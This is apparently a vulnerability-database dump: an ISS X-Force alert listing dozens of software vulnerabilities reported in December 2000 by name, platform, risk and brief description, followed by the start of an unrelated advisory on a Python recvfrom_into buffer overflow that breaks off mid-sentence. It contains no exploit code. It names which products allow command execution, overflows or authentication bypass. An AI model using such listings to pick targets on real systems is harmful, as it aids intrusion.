Platforms Affected: Shockwave Plugin 8.0 and prior
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: Shockwave Flash SWF file buffer overflow
X-Force URL: http://xforce.iss.net/static/5826.php
_____
Date Reported: 12/29/00
Vulnerability: macos-multiple-users
Platforms Affected: MacOS 9.0
Risk Factor: High
Attack Type: Host Based
Brief Description: Mac OS 'Multiple Users' bypass password
X-Force URL: http://xforce.iss.net/static/5830.php
_____
Date Reported: 12/28/00
Vulnerability: http-cgi-ikonboard
Platforms Affected: Ikonboard 2.1.7b and prior
Risk Factor: High
Attack Type: Host Based
Brief Description: Ikonboard allows remote attacker to execute
commands
X-Force URL: http://xforce.iss.net/static/5819.php
_____
Date Reported: 12/27/00
Vulnerability: http-cgi-technote-main
Platforms Affected: TECH-NOTE (000, 2001, Pro)
Risk Factor: High
Attack Type: Network Based
Brief Description: TECH-NOTE main.cgi reveals files
X-Force URL: http://xforce.iss.net/static/5813.php
_____
Date Reported: 12/26/00
Vulnerability: xwindows-char-dos
Platforms Affected: XFree86
Risk Factor: Low
Attack Type: Network/Host Based
Brief Description: X Windows multiple character denial of service
X-Force URL: http://xforce.iss.net/static/5834.php
_____
Date Reported: 12/25/00
Vulnerability: 1stup-mail-server-bo
Platforms Affected: 1st Up Mail Server 4.1
Risk Factor: Medium
Attack Type: Network Based
Brief Description: 1st Up Mail Server buffer overflow
X-Force URL: http://xforce.iss.net/static/5808.php
_____
Date Reported: 12/25/00
Vulnerability: dialog-symlink
Platforms Affected: Linux Debian 2.2
Risk Factor: High
Attack Type: Host Based
Brief Description: Linux dialog package symlink attack
X-Force URL: http://xforce.iss.net/static/5809.php
_____
Date Reported: 12/25/00
Vulnerability: ibm-wcs-admin
Platforms Affected: IBM Websphere Commerce Suite
Risk Factor: High
Attack Type: Host Based
Brief Description: IBM WCS admin.config allows user to execute
arbitrary commands
X-Force URL: http://xforce.iss.net/static/5831.php
_____
Date Reported: 12/23/00
Vulnerability: http-cgi-technote-print
Platforms Affected: TECH-NOTE (2000, 2001, Pro)
Risk Factor: Medium
Attack Type: Network Based
Brief Description: TECH-NOTE print.cgi reveals files
X-Force URL: http://xforce.iss.net/static/5815.php
_____
Date Reported: 12/22/00
Vulnerability: iis-web-form-submit
Platforms Affected: IIS (4.0, 5.0)
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: IIS Web form submission
X-Force URL: http://xforce.iss.net/static/5823.php
_____
Date Reported: 12/21/00
Vulnerability: hpux-kermit-bo
Platforms Affected: HPUX (10.01, 10.10, 10.20, 11.00)
Risk Factor: Medium
Attack Type: Host Based
Brief Description: HP-UX kermit buffer overflow
X-Force URL: http://xforce.iss.net/static/5793.php
_____
Date Reported: 12/21/00
Vulnerability: bsguest-cgi-execute-commands
Platforms Affected: Linux
Risk Factor: Medium
Attack Type: Network Based
Brief Description: bsguest.cgi allows remote execution of commands on
server
X-Force URL: http://xforce.iss.net/static/5796.php
_____
Date Reported: 12/21/00
Vulnerability: bslist-cgi-execute-commands
Platforms Affected: Linux
Risk Factor: Medium
Attack Type: Network Based
Brief Description: bslist.cgi allows remote execution of commands on
server
X-Force URL: http://xforce.iss.net/static/5797.php
_____
Date Reported: 12/21/00
Vulnerability: infinite-interchange-dos
Platforms Affected: Infinite Interchange 3.61
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Infinite InterChange denial of service
X-Force URL: http://xforce.iss.net/static/5798.php
_____
Date Reported: 12/21/00
Vulnerability: oracle-execute-plsql
Platforms Affected: Oracle Application Server
Risk Factor: Medium
Attack Type: Network Based
Brief Description: Oracle remote procedure execution
X-Force URL: http://xforce.iss.net/static/5817.php
_____
Date Reported: 12/21/00
Vulnerability: ksh-redirection-symlink
Platforms Affected: IRIX (6.2, 6.5.x)
Solaris (2.5.1, 2.6, 7)
HPUX 9.00
Digital Unix 5.0
Risk Factor: High
Attack Type: Host Based
Brief Description: ksh redirection symlink attack
X-Force URL: http://xforce.iss.net/static/5811.php
_____
Date Reported: 12/21/00
Vulnerability: oracle-webdb-admin-access
Platforms Affected: Oracle Internet Application Server 3.0.7
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: Oracle IAS allows administrative access
X-Force URL: http://xforce.iss.net/static/5818.php
_____
Date Reported: 12/21/00
Vulnerability: infinite-interchange-dos
Platforms Affected: Infinite Interchange 3.61
Risk Factor: Web Scan
Attack Type: Network/Host Based
Brief Description: Infinite InterChange denial of service
X-Force URL: http://xforce.iss.net/static/5798.php
_____
Date Reported: 12/20/00
Vulnerability: gnupg-detached-sig-modify
Platforms Affected: GnuPG (1.0, 1.0.1, 1.0.2, 1.0.3)
Risk Factor: Medium
Attack Type: Host Based
Brief Description: GnuPG allows users to modify signed messages with
detached signatures
X-Force URL: http://xforce.iss.net/static/5802.php
_____
Date Reported: 12/20/00
Vulnerability: gnupg-reveal-private
Platforms Affected: GnuPG (1.0, 1.0.1, 1.0.2, 1.0.3)
Risk Factor: Medium
Attack Type: Host Based
Brief Description: GnuPG will import private keys along with public
keys
X-Force URL: http://xforce.iss.net/static/5803.php
_____
Date Reported: 12/20/00
Vulnerability: zonealarm-nmap-scans
Platforms Affected: ZoneAlarm
Risk Factor: High
Attack Type: Network Based
Brief Description: ZoneAlarm does not detect NMAP scans
X-Force URL: http://xforce.iss.net/static/5799.php
_____
Date Reported: 12/20/00
Vulnerability: zonealarm-open-shares
Platforms Affected: ZoneAlarm
Risk Factor: High
Attack Type: Network Based
Brief Description: ZoneAlarm open shares
X-Force URL: http://xforce.iss.net/static/5825.php
_____
Date Reported: 12/19/00
Vulnerability: win2k-index-service-activex
Platforms Affected: Windows 2000
Risk Factor: Low
Attack Type: Network/Host Based
Brief Description: Windows 2000 Index Service ActiveX controls allow
unauthorized access to file information
X-Force URL: http://xforce.iss.net/static/5800.php
_____
Date Reported: 12/19/00
Vulnerability: proftpd-size-memory-leak
Platforms Affected: Proftpd
Risk Factor: Low
Attack Type: Network/Host Based
Brief Description: proftpd memory leak when using SIZE command
X-Force URL: http://xforce.iss.net/static/5801.php
_____
Date Reported: 12/19/00
Vulnerability: weblogic-dot-bo
Platforms Affected: WebLogic
Risk Factor: Medium
Attack Type: Network Based
Brief Description: BEA WebLogic Server "dotdot" URL buffer overflow
X-Force URL: http://xforce.iss.net/static/5782.php
_____
Date Reported: 12/19/00
Vulnerability: mdaemon-imap-dos
Platforms Affected: MDaemon
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: MDaemon IMAP buffer overflow denial of service
X-Force URL: http://xforce.iss.net/static/5805.php
_____
Date Reported: 12/19/00
Vulnerability: zope-calculate-roles
Platforms Affected: Zp[e
Risk Factor: High
Attack Type: Host Based
Brief Description: zope package in Linux calculates local roles
incorrectly
X-Force URL: http://xforce.iss.net/static/5777.php
_____
Date Reported: 12/19/00
Vulnerability: itetris-svgalib-path
Platforms Affected: svgalib
Risk Factor: High
Attack Type: Host Based
Brief Description: Itetris svgalib PATH
X-Force URL: http://xforce.iss.net/static/5795.php
_____
Date Reported: 12/18/00
Vulnerability: bsd-ftpd-replydirname-bo
Platforms Affected: BSD Based Operating Systems
Risk Factor: High
Attack Type: Network Based
Brief Description: BSD ftpd replydirname() function buffer overflow
X-Force URL: http://xforce.iss.net/static/5776.php
_____
Date Reported: 12/18/00
Vulnerability: sonata-command-execute
Platforms Affected: Sonata
Risk Factor: High
Attack Type: Host Based
Brief Description: Sonata argument command line execution
X-Force URL: http://xforce.iss.net/static/5787.php
_____
Date Reported: 12/18/00
Vulnerability: solaris-catman-symlink
Platforms Affected: Solaris
Risk Factor: High
Attack Type: Host Based
Brief Description: Solaris catman command symlink attack
X-Force URL: http://xforce.iss.net/static/5788.php
_____
Date Reported: 12/18/00
Vulnerability: solaris-patchadd-symlink
Platforms Affected: Solaris
Risk Factor: High
Attack Type: Host Based
Brief Description: Solaris patchadd symlink attack
X-Force URL: http://xforce.iss.net/static/5789.php
_____
Date Reported: 12/18/00
Vulnerability: stunnel-format-logfile
Platforms Affected: Stunnel
Risk Factor: High
Attack Type: Network Based
Brief Description: Stunnel format allows user to write to logfile
X-Force URL: http://xforce.iss.net/static/5807.php
_____
Date Reported: 12/17/00
Vulnerability: hp-top-sys-files
Platforms Affected: HPUX
Risk Factor: Low
Attack Type: Host Based
Brief Description: HP-UX top command could be used to overwrite files
X-Force URL: http://xforce.iss.net/static/5773.php
_____
Date Reported: 12/16/00
Vulnerability: zope-legacy-names
Platforms Affected: Zope
Risk Factor: Medium
Attack Type: Network Based
Brief Description: Linux zope package "legacy" names
X-Force URL: http://xforce.iss.net/static/5824.php
_____
Date Reported: 12/15/00
Vulnerability: mrj-runtime-malicious-applets
Platforms Affected: MRJ
Risk Factor: Low
Attack Type: Host Based
Brief Description: MRJ runtime environment could allow malicious
applets to be executed
X-Force URL: http://xforce.iss.net/static/5784.php
_____
Date Reported: 12/14/00
Vulnerability: coffeecup-ftp-weak-encryption
Platforms Affected: CoffeeCup FTP
Risk Factor: Low
Attack Type: Host Based
Brief Description: CoffeeCup FTP client has weak password encryption
X-Force URL: http://xforce.iss.net/static/5744.php
_____
Date Reported: 12/14/00
Vulnerability: watchguard-soho-fragmented-packets
Platforms Affected: WatchGuard
Risk Factor: Medium
Attack Type: Network Based
Brief Description: WatchGuard SOHO Firewall fragmented IP packet
attack
X-Force URL: http://xforce.iss.net/static/5749.php
_____
Date Reported: 12/14/00
Vulnerability: jpilot-perms
Platforms Affected: J-Pilot
Risk Factor: Medium
Attack Type: Host Based
Brief Description: J-Pilot permissions could reveal sensitive
information
X-Force URL: http://xforce.iss.net/static/5762.php
_____
Date Reported: 12/14/00
Vulnerability: mediaservices-dropped-connection-dos
Platforms Affected: Microsoft Media Services
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Microsoft Media Services dropped connection denial
of service
X-Force URL: http://xforce.iss.net/static/5785.php
_____
Date Reported: 12/14/00
Vulnerability: watchguard-soho-web-auth
Platforms Affected: WatchGuard
Risk Factor: High
Attack Type: Network Based
Brief Description: WatchGuard SOHO Web config server could allow
unauthenticated access
X-Force URL: http://xforce.iss.net/static/5554.php
_____
Date Reported: 12/14/00
Vulnerability: watchguard-soho-passcfg-reset
Platforms Affected: WatchGuard
Risk Factor: High
Attack Type: Network Based
Brief Description: WatchGuard SOHO administrator password can be
remotely reset
X-Force URL: http://xforce.iss.net/static/5742.php
_____
Date Reported: 12/14/00
Vulnerability: http-cgi-simplestguest
Platforms Affected: simplestguest.cgi
Risk Factor: High
Attack Type: Network Based
Brief Description: simplestguest.cgi input validation error
X-Force URL: http://xforce.iss.net/static/5743.php
_____
Date Reported: 12/14/00
Vulnerability: safeword-palm-pin-extraction
Platforms Affected: SafeWord
e.iD Palm Authenticator
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: SafeWord and e.iD Palm Authenticator allows
attacker to clone Palm device
X-Force URL: http://xforce.iss.net/static/5753.php
_____
Date Reported: 12/14/00
Vulnerability: mdaemon-lock-bypass-password
Platforms Affected: MDaemon
Risk Factor: High
Attack Type: Host Based
Brief Description: MDaemon "lock" bypass password
X-Force URL: http://xforce.iss.net/static/5763.php
_____
Date Reported: 12/13/00
Vulnerability: cisco-catalyst-ssh-mismatch
Platforms Affected: Cisco Catalyst
Risk Factor: Low
Attack Type: Network Based
Brief Description: Cisco Catalyst SSH protocol mismatch
X-Force URL: http://xforce.iss.net/static/5760.php
_____
Date Reported: 12/13/00
Vulnerability: microsoft-iis-file-disclosure
Platforms Affected: IIS
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Microsoft IIS Far East editions file disclosure
X-Force URL: http://xforce.iss.net/static/5729.php
_____
Date Reported: 12/13/00
Vulnerability: ezshopper-cgi-file-disclosure
Platforms Affected: loadpage.cgi
Risk Factor: Medium
Attack Type: Network Based
Brief Description: EZshopper loadpage.cgi file disclosure
X-Force URL: http://xforce.iss.net/static/5740.php
_____
Date Reported: 12/13/00
Vulnerability: winnt-mstask-dos
Platforms Affected: Windows NT
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Windows NT MSTask.exe denial of service
X-Force URL: http://xforce.iss.net/static/5746.php
_____
Date Reported: 12/13/00
Vulnerability: bftpd-site-chown-bo
Platforms Affected: BFTPD
Risk Factor: High
Attack Type: Network Based
Brief Description: BFTPD SITE CHOWN buffer overflow
X-Force URL: http://xforce.iss.net/static/5775.php
_____
Date Reported: 12/12/00
Vulnerability: aim-remote-bo
Platforms Affected: AOL Instant Messenger
Risk Factor: Medium
Attack Type: Network Based
Brief Description: AOL Instant Messenger buffer overflow
X-Force URL: http://xforce.iss.net/static/5732.php
_____
Date Reported: 12/12/00
Vulnerability: subscribemelite-gain-admin-access
Platforms Affected: Subscribe Me Lite
Risk Factor: Medium
Attack Type: Network Based
Brief Description: Subscribe Me Lite mailing list manager
unauthorized access
X-Force URL: http://xforce.iss.net/static/5735.php
_____
Date Reported: 12/12/00
Vulnerability: zope-image-file
Platforms Affected: Zope
Risk Factor: Medium
Attack Type: Host Based
Brief Description: Linux zope package Image and File objects
X-Force URL: http://xforce.iss.net/static/5778.php
_____
Date Reported: 12/12/00
Vulnerability: http-cgi-everythingform
Platforms Affected: everythingform.cgi
Risk Factor: High
Attack Type: Network Based
Brief Description: everythingform.cgi input validation error
X-Force URL: http://xforce.iss.net/static/5736.php
_____
Date Reported: 12/12/00
Vulnerability: http-cgi-simplestmail
Platforms Affected: simplestmail.cgi
Risk Factor: High
Attack Type: Network Based
Brief Description: simplestmail.cgi input validation error
X-Force URL: http://xforce.iss.net/static/5739.php
_____
Date Reported: 12/12/00
Vulnerability: http-cgi-ad
Platforms Affected: ad.cgi
Risk Factor: High
Attack Type: Network Based
Brief Description: ad.cgi input validation error
X-Force URL: http://xforce.iss.net/static/5741.php
_____
Date Reported: 12/12/00
Vulnerability: kde-kmail-weak-encryption
Platforms Affected: KDE KMail
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: KDE KMail weak password encryption
X-Force URL: http://xforce.iss.net/static/5761.php
_____
Date Reported: 12/12/00
Vulnerability: aolim-buddyicon-bo
Platforms Affected: AOL Instant Messenger
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: AOL Instant Messenger Buddy Icon buffer overflow
X-Force URL: http://xforce.iss.net/static/5786.php
_____
Date Reported: 12/12/00
Vulnerability: aim-remote-bo
Platforms Affected: AOL Instant Messenger
Risk Factor: Medium
Attack Type: Network Based
Brief Description: AOL Instant Messenger buffer overflow
X-Force URL: http://xforce.iss.net/static/5732.php
_____
Date Reported: 12/11/00
Vulnerability: rppppoe-zero-length-dos
Platforms Affected: rp-pppoe
Risk Factor: Medium
Attack Type: Network Based
Brief Description: rp-pppoe "zero-length" option denial of service
X-Force URL: http://xforce.iss.net/static/5727.php
_____
Date Reported: 12/11/00
Vulnerability: proftpd-modsqlpw-unauth-access
Platforms Affected: ProFTPd
Risk Factor: Medium
Attack Type: Network Based
Brief Description: ProFTPD system using mod_sqlpw unauthorized access
X-Force URL: http://xforce.iss.net/static/5737.php
_____
Date Reported: 12/11/00
Vulnerability: gnu-ed-symlink
Platforms Affected: GNU ed
Risk Factor: High
Attack Type: Host Based
Brief Description: GNU ed symlink
X-Force URL: http://xforce.iss.net/static/5723.php
_____
Date Reported: 12/11/00
Vulnerability: oops-ftputils-bo
Platforms Affected: Oops Proxy Server
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: Oops Proxy Server ftp_utils buffer overflow
X-Force URL: http://xforce.iss.net/static/5725.php
_____
Date Reported: 12/11/00
Vulnerability: oracle-oidldap-write-permission
Platforms Affected: Oracle Internet Directory
Risk Factor: High
Attack Type: Host Based
Brief Description: Oracle Internet Directory write permission
X-Force URL: http://xforce.iss.net/static/5804.php
_____
Date Reported: 12/9/00
Vulnerability: foolproof-security-bypass
Platforms Affected: FoolProof
Risk Factor: High
Attack Type: Host Based
Brief Description: FoolProof Security restriction bypass using FTP
X-Force URL: http://xforce.iss.net/static/5758.php
_____
Date Reported: 12/8/00
Vulnerability: broadvision-bv1to1-reveal-path
Platforms Affected: BroadVision One-To-One Enterprise Server
Risk Factor: Low
Attack Type: Network Based
Brief Description: BroadVision One-To-One Enterprise Server reveals
path to server
X-Force URL: http://xforce.iss.net/static/5661.php
_____
Date Reported: 12/8/00
Vulnerability: ssldump-format-strings
Platforms Affected: ssldump
Risk Factor: Medium
Attack Type: Network Based
Brief Description: ssldump format string could allow arbitrary
execution of code
X-Force URL: http://xforce.iss.net/static/5717.php
_____
Date Reported: 12/8/00
Vulnerability: coldfusion-sample-dos
Platforms Affected: ColdFusion
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: ColdFusion sample script denial of service
X-Force URL: http://xforce.iss.net/static/5755.php
_____
Date Reported: 12/8/00
Vulnerability: kerberos4-arbitrary-proxy
Platforms Affected: Kerberos 4
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: KTH Kerberos 4 arbitrary proxy enviornment
variable
X-Force URL: http://xforce.iss.net/static/5733.php
_____
Date Reported: 12/8/00
Vulnerability: kerberos4-auth-packet-overflow
Platforms Affected: Kerberos 4
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: KTH Kerberos 4 authentication packet buffer
overflow
X-Force URL: http://xforce.iss.net/static/5734.php
_____
Date Reported: 12/8/00
Vulnerability: kerberos4-user-config
Platforms Affected: Kerberos 4
Risk Factor: High
Attack Type: Host Based
Brief Description: KTH Kerberos 4 user supplied configuration files
X-Force URL: http://xforce.iss.net/static/5738.php
_____
Date Reported: 12/8/00
Vulnerability: kerberos4-tmpfile-dos
Platforms Affected: Kerberos 4
Risk Factor: High
Attack Type: Host Based
Brief Description: KTH Kerberos 4 race condition
X-Force URL: http://xforce.iss.net/static/5754.php
_____
Date Reported: 12/7/00
Vulnerability: homeseer-directory-traversal
Platforms Affected: HomeSeer
Risk Factor: Low
Attack Type: Network Based
Brief Description: HomeSeer allows directory traversal
X-Force URL: http://xforce.iss.net/static/5663.php
_____
Date Reported: 12/7/00
Vulnerability: offline-explorer-reveal-files
Platforms Affected: MetaProducts Offline Explorer
Risk Factor: Low
Attack Type: Network/Host Based
Brief Description: MetaProducts Offline Explorer can reveal file
system
X-Force URL: http://xforce.iss.net/static/5728.php
_____
Date Reported: 12/7/00
Vulnerability: imail-smtp-auth-dos
Platforms Affected: IMail
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: IMail SMTP auth denial of service
X-Force URL: http://xforce.iss.net/static/5674.php
_____
Date Reported: 12/6/00
Vulnerability: apc-apcupsd-dos
Platforms Affected: APC apcupsd
Risk Factor: Medium
Attack Type: Host Based
Brief Description: APC apcupsd denial of service
X-Force URL: http://xforce.iss.net/static/5654.php
_____
Date Reported: 12/6/00
Vulnerability: cisco-catalyst-telnet-dos
Platforms Affected: Cisco Catalyst
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Cisco Catalyst telnet server memory leak denial of
service
X-Force URL: http://xforce.iss.net/static/5656.php
_____
Date Reported: 12/6/00
Vulnerability: apache-php-disclose-files
Platforms Affected: Apache Web server
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Apache Web server discloses files when used with
php script
X-Force URL: http://xforce.iss.net/static/5659.php
_____
Date Reported: 12/6/00
Vulnerability: ultraseek-reveal-path
Platforms Affected: Ultraseek
Risk Factor: Medium
Attack Type: Network Based
Brief Description: Ultraseek Server can reveal the path and source
code to certain files
X-Force URL: http://xforce.iss.net/static/5660.php
_____
Date Reported: 12/6/00
Vulnerability: irc-dreamforge-dns-dos
Platforms Affected: DreamForge IRCd
Risk Factor: Medium
Attack Type: Network Based
Brief Description: DreamForge IRCd DNS denial of service
X-Force URL: http://xforce.iss.net/static/5721.php
_____
Date Reported: 12/6/00
Vulnerability: mailman-alternate-templates
Platforms Affected: MailMan
Risk Factor: High
Attack Type: Network Based
Brief Description: MailMan Alternate Templates form variable allows
remote attacker to execute commands
X-Force URL: http://xforce.iss.net/static/5649.php
_____
Date Reported: 12/6/00
Vulnerability: phpgroupware-include-files
Platforms Affected:
Risk Factor: High
Attack Type: Network Based
Brief Description: phpGroupWare include files allows remote attacker
to execute commands
X-Force URL: http://xforce.iss.net/static/5650.php
_____
Date Reported: 12/6/00
Vulnerability: markvision-printer-driver-bo
Platforms Affected: Lexmark MarkVision
Risk Factor: High
Attack Type: Host Based
Brief Description: Lexmark MarkVision printer drivers for Unix buffer
overflows
X-Force URL: http://xforce.iss.net/static/5651.php
_____
Date Reported: 12/6/00
Vulnerability: nt-ras-reg-perms
Platforms Affected: Windows NT
Risk Factor: High
Attack Type: Host Based
Brief Description: Windows NT RAS registry permissions
X-Force URL: http://xforce.iss.net/static/5671.php
_____
Date Reported: 12/6/00
Vulnerability: nt-snmp-reg-perms
Platforms Affected: Windows NT
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: Windows NT SNMP registry permissions
X-Force URL: http://xforce.iss.net/static/5672.php
_____
Date Reported: 12/6/00
Vulnerability: nt-mts-reg-perms
Platforms Affected: Windows NT
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: Windows NT MTS registry permissions
X-Force URL: http://xforce.iss.net/static/5673.php
_____
Date Reported: 12/6/00
Vulnerability: irc-bitchx-dns-bo
Platforms Affected: BitchX
Risk Factor: High
Attack Type: Network Based
Brief Description: BitchX IRC DNS buffer overflow
X-Force URL: http://xforce.iss.net/static/5701.php
_____
Date Reported: 12/5/00
Vulnerability: ibm-db2-gain-access
Platforms Affected: IBM DB2
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: IBM DB2 Universal Database can give access through
default username and password
X-Force URL: http://xforce.iss.net/static/5662.php
_____
Date Reported: 12/5/00
Vulnerability: ibm-db2-dos
Platforms Affected: IBM DB2
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: IBM DB2 Universal Database denial of service
X-Force URL: http://xforce.iss.net/static/5664.php
_____
Date Reported: 12/5/00
Vulnerability: vsu-source-routing
Platforms Affected: VSU
Risk Factor: Medium
Attack Type: Network Based
Brief Description: VPNet VSU gateways contain source routing
X-Force URL: http://xforce.iss.net/static/5667.php
_____
Date Reported: 12/5/00
Vulnerability: vsu-ip-bridging
Platforms Affected: VSU
Risk Factor: Medium
Attack Type: Network Based
Brief Description: VPNet VSU gateways contain bridging code
X-Force URL: http://xforce.iss.net/static/5670.php
_____
Date Reported: 12/5/00
Vulnerability: ftp-servu-homedir-travers
Platforms Affected: Serv-U FTP
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: FTP Serv-U home directory traversal could allow
access to FTProot
X-Force URL: http://xforce.iss.net/static/5639.php
_____
Date Reported: 12/4/00
Vulnerability: cisco-cbos-web-access
Platforms Affected: CISCO CBOS
Risk Factor: Medium
Attack Type: Network Based
Brief Description: Cisco CBOS Web access enabled denial of service
X-Force URL: http://xforce.iss.net/static/5626.php
_____
Date Reported: 12/4/00
Vulnerability: watchguard-soho-get-dos
Platforms Affected: WatchGuard SOHO
Risk Factor: Medium
Attack Type: Network Based
Brief Description: WatchGuard SOHO Firewall multiple GET requests
denial of service
X-Force URL: http://xforce.iss.net/static/5665.php
_____
Date Reported: 12/4/00
Vulnerability: phone-book-service-bo
Platforms Affected: Windows 2000
Windows NT
Risk Factor: High
Attack Type: Network Based
Brief Description: Windows NT and 2000 Phone Book service buffer
overflow
X-Force URL: http://xforce.iss.net/static/5623.php
_____
Date Reported: 12/4/00
Vulnerability: cisco-cbos-syn-packets
Platforms Affected: CISCO CBOS
Risk Factor: High
Attack Type: Network Based
Brief Description: Cisco CBOS SYN packets denial of service
X-Force URL: http://xforce.iss.net/static/5627.php
_____
Date Reported: 12/4/00
Vulnerability: cisco-cbos-invalid-login
Platforms Affected: CISCO CBOS
Risk Factor: High
Attack Type: Network Based
Brief Description: Cisco CBOS does not log invalid logins
X-Force URL: http://xforce.iss.net/static/5628.php
_____
Date Reported: 12/4/00
Vulnerability: cisco-cbos-icmp-echo
Platforms Affected: CISCO CBOS
Risk Factor: High
Attack Type: Network Based
Brief Description: Cisco CBOS large ICMP ECHO packet denial of
service
X-Force URL: http://xforce.iss.net/static/5629.php
_____
Date Reported: 12/2/00
Vulnerability: phpweblog-bypass-authentication
Platforms Affected: phpWebLog
Risk Factor: High
Attack Type: Host Based
Brief Description: phpWebLog allows users to bypass authentication
X-Force URL: http://xforce.iss.net/static/5625.php
_____
Date Reported: 12/1/00
Vulnerability: linux-diskcheck-race-symlink
Platforms Affected: Linux
Risk Factor: Low
Attack Type: Host Based
Brief Description: Linux diskcheck race condition could allow a tmp
file symbolic link attack
X-Force URL: http://xforce.iss.net/static/5624.php
_____
Date Reported: 12/1/00
Vulnerability: ie-form-file-upload
Platforms Affected: Microsoft Internet Explorer
Risk Factor: Medium
Attack Type: Network/Host Based
Brief Description: Internet Explorer file upload form
X-Force URL: http://xforce.iss.net/static/5615.php
_____
Date Reported: 12/1/00
Vulnerability: mssql-xp-paraminfo-bo
Platforms Affected:
Risk Factor: Medium
Attack Type: Host Based
Brief Description: Microsoft SQL XP srv_paraminfo() buffer overflow
X-Force URL: http://xforce.iss.net/static/5622.php
_____
Date Reported: 12/1/00
Vulnerability: majordomo-auth-execute-commands
Platforms Affected: Majordomo
Risk Factor: High
Attack Type: Network Based
Brief Description: Majordomo allows administrative access without
password
X-Force URL: http://xforce.iss.net/static/5611.php
_____
Date Reported: 12/1/00
Vulnerability: ie-print-template
Platforms Affected: Microsoft Internet Explorer
Risk Factor: High
Attack Type: Network/Host Based
Brief Description: Internet Explorer print template
X-Force URL: http://xforce.iss.net/static/5614.php
_____
Date Reported: 12/1/00
Vulnerability: aix-piobe-bo
Platforms Affected: AIX
Risk Factor: High
Attack Type: Host Based
Brief Description: AIX piobe buffer overflow
X-Force URL: http://xforce.iss.net/static/5616.php
_____
Date Reported: 12/1/00
Vulnerability: aix-pioout-bo
Platforms Affected: AIX
Risk Factor: High
Attack Type: Host Based
Brief Description: AIX pioout buffer overflow
X-Force URL: http://xforce.iss.net/static/5617.php
_____
Date Reported: 12/1/00
Vulnerability: aix-setclock-bo
Platforms Affected: AIX
Risk Factor: High
Attack Type: Host Based
Brief Description: AIX setclock buffer overflow
X-Force URL: http://xforce.iss.net/static/5618.php
_____
Date Reported: 12/1/00
Vulnerability: aix-enq-bo
Platforms Affected: AIX
Risk Factor: High
Attack Type: Host Based
Brief Description: AIX enq buffer overflow
X-Force URL: http://xforce.iss.net/static/5619.php
_____
Date Reported: 12/1/00
Vulnerability: aix-digest-bo
Platforms Affected: AIX
Risk Factor: High
Attack Type: Host Based
Brief Description: AIX digest buffer overflow
X-Force URL: http://xforce.iss.net/static/5620.php
_____
Date Reported: 12/1/00
Vulnerability: aix-setsenv-bo
Platforms Affected: AIX
Risk Factor: High
Attack Type: Host Based
Brief Description: AIX setsenv buffer overflow
X-Force URL: http://xforce.iss.net/static/5621.php
Risk Factor Key:
High Any vulnerability that provides an attacker with immediate
access into a machine, gains superuser access, or bypasses
a firewall. Example: A vulnerable Sendmail 8.6.5 version
that allows an intruder to execute commands on mail
server.
Medium Any vulnerability that provides information that has a
high potential of giving system access to an intruder.
Example: A misconfigured TFTP or vulnerable NIS server
that allows an intruder to get the password file that
could contain an account with a guessable password.
Low Any vulnerability that provides information that
potentially could lead to a compromise. Example: A
finger that allows an intruder to find out who is online
and potential accounts to attempt to crack passwords
via brute force methods.
_____
Additional Information
This document is available at http://xforce.iss.net/alerts/advisennn.php.
To receive these Alerts and Advisories:
- - Subscribe to the Alert mailing list from
http://xforce.iss.net/maillists/index.php
- - Or send an email to majordomo@iss.net, and within the body of the
message type:
'subscribe alert' (without the quotes).
About Internet Security Systems (ISS)
Internet Security Systems, Inc. (ISS) (NASDAQ: ISSX) is the leading
global provider of security management solutions for the Internet.
By combining best of breed products, security management services,
aggressive research and development, and comprehensive educational
and consulting services, ISS is the trusted security advisor for
thousands of organizations around the world looking to protect their
mission critical information and networks.
Copyright (c) 2001 by Internet Security Systems, Inc.
Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express consent
of the X-Force. If you wish to reprint the whole or any part of this
Alert in any other medium excluding electronic medium, please e-mail
xforce@iss.net for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.
X-Force PGP Key available at: http://xforce.iss.net/sensitive.php as
well as on MIT's PGP key server and PGP.com's key server.
Please send suggestions, updates, and comments to: X-Force xforce@iss.net
of Internet Security Systems, Inc.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv
iQCVAwUBOmd8xjRfJiV99eG9AQHGkAQAgX36zVSxItnmE160WG5ws5c6tp0F0Sr0
LLmTWkj7iiYUNv2dKxsw0L4IxItVyilHBYDDrQtjpD76ABE1YhaU2qxlFCeNqMoL
r21MXXYy0JZWfMCU+t7dk7VNtDzy/0EpbZIcBqziisvQJYgUin3viD54QK+gsYIw
jbM10AXVSHw=
=5U+8
-----END PGP SIGNATURE-----
|
|
var-201403-0387
|
Buffer overflow in the socket.recvfrom_into function in Modules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4, and 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary code via a crafted string. Python is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
Python 2.7,3.1,3.2,3.3 are vulnerable. The language is scalable, supports modules and packages, and supports multiple platforms. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Python 3.3 users should upgrade to the latest version:
